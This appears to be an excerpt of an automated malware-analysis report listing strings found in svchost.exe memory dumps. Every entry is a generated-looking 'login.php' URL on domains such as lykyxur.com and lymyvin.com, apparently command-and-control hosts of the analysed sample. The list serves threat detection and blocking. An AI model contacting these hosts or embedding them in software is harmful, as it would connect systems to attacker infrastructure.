Source: svchost.exe, 00000002.00000003.2194039895.000000000865C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2503287920.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502622128.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388007673.0000000000884000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3404121983.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513112023.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341799100.00000000087A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197046.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202332641.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393482937.000000000339B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344396822.0000000003399000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykygur.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2578065233.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykylan.com/login.php
Source: svchost.exe, 00000002.00000003.2796055638.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2793841550.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384104652.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykynyd.com/login.php
Source: svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246499612.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3268596550.0000000008643000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2673206249.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3284179552.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykyser.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558551911.00000000008A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykytej.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353793003.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2745079929.0000000008783000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351137108.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738837414.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykytin.com/login.php
Source: svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykyvod.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykyvyx.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3245948099.0000000008615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3343594271.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2802384900.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3401732575.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3341805017.0000000008619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2603580004.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321538396.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2596489806.0000000008611000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykywid.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lykyxur.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymyfoj.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353785619.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752503084.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353676961.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359453590.000000000878B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352880774.000000000878B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymygor.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302611741.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2298951843.00000000086D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307945417.0000000008615000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302834749.0000000008690000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303296410.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320123040.0000000008611000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymygyx.com/login.php
Source: svchost.exe, 00000002.00000003.2671509523.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349866379.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349127281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymyjyd.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672088553.0000000008785000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607736058.0000000008786000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610102916.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604615321.0000000008783000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymylij.com/login.php
Source: svchost.exe, 00000002.00000003.2671356551.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350325354.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671936852.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349262173.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2350047450.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2738516422.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665740291.00000000087FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymymax.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2550145927.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2308037835.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296517767.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549686862.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548641598.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558367053.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2549395486.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302432052.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2323670952.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296776136.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547272194.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2305095010.0000000008701000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2548645821.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2295479426.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296451736.0000000008702000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296803931.00000000086F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymymud.com/login.php
Source: svchost.exe, 00000002.00000003.2301052009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303334009.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2302611741.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553968961.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2552314103.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2300434955.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557483842.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2303296410.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2307697997.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2556984027.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2301364243.00000000033EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymyner.com/login.php
Source: svchost.exe, 00000002.00000003.2357365639.00000000087B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359008557.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2354372156.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352296383.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353331404.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352299692.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2353878040.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352873601.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352879533.00000000086FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymynuj.com/login.php
Source: svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610102916.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329748670.0000000003393000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329628428.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330446877.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328870829.000000000868F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337011719.0000000003394000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334181353.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326892101.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334382414.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymysud.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334498126.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334047161.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332552292.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337179930.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332145984.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334936802.0000000008682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336690325.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2332778027.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2333419776.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2334800958.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610879120.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymytar.com/login.php
Source: svchost.exe, 00000002.00000003.2432573037.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2538475351.00000000087FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3344516796.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202773518.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3393093066.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402132488.0000000008646000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202728385.0000000008644000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194320231.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3388123270.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2296327594.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202674715.0000000003353000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434123780.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3402591277.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2432700162.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2194197284.0000000008691000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymytux.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760246399.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2592000281.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3246274264.000000000870B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3403579535.000000000870D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2752639627.00000000086F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2771121340.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2744373638.00000000086F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2748851196.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2610522908.0000000008706000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2749199124.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2759913760.00000000086F1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2801740808.00000000086F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2768400966.0000000008705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymyvin.com/login.php
Source: svchost.exe, 00000002.00000003.2337642053.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338991462.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339128784.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338382961.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2628718282.00000000087AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670315739.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2670012329.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2640219450.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339275288.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635696281.00000000087B0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339131570.0000000008691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347564818.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635676013.00000000086EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2338959183.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635826907.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2671484952.00000000086F2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2638579923.00000000087B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lymywun.com/login.php
Source: svchost.exe, 00000002.00000003.2588418708.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582588416.00000000087AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328737400.00000000086FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2582447207.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328002527.00000000086FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326381294.00000000086F0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2580751870.00000000087AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2326465693.00000000086F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyryfox.com/login.php
Source: svchost.exe, 00000002.00000003.2319836186.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577742596.0000000008692000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321073412.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2573770543.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2319581709.00000000086F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577938444.0000000008693000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2321666596.00000000033D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://lyrygyn.com/login.php
